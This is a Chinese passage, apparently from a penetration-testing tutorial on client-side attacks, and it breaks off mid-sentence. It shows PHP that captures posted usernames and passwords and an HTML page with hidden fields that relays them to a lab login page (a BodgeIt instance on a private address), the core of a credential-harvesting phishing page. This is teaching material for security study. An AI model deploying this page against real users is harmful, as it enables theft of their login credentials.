14、客户端攻击与安全漏洞缓解技术详解

客户端攻击与安全漏洞缓解技术详解

自动提交表单数据

在登录操作中，为避免依赖用户输入正确的值，可以通过以下代码实现表单数据的自动提交：

$username=$_POST["username"]; $password=$_POST["password"]; $submit="Login";

接着创建一个 HTML 页面，包含一个表单，当页面加载完成时会自动将用户名、密码和提交值发送到原始站点：

<body> <form method="POST" action="http://192.168.56.102/bodgeit/login.jsp"> <input type="hidden" value= "<?php echo $username;?>" name ="username"> <input type="hidden" value= "<?php echo $password;?>" name ="password"> <input type="submit" value= "<?php echo $submit;?>" name ="submit"> </form> </body>

这里需要注意的是，<body>标签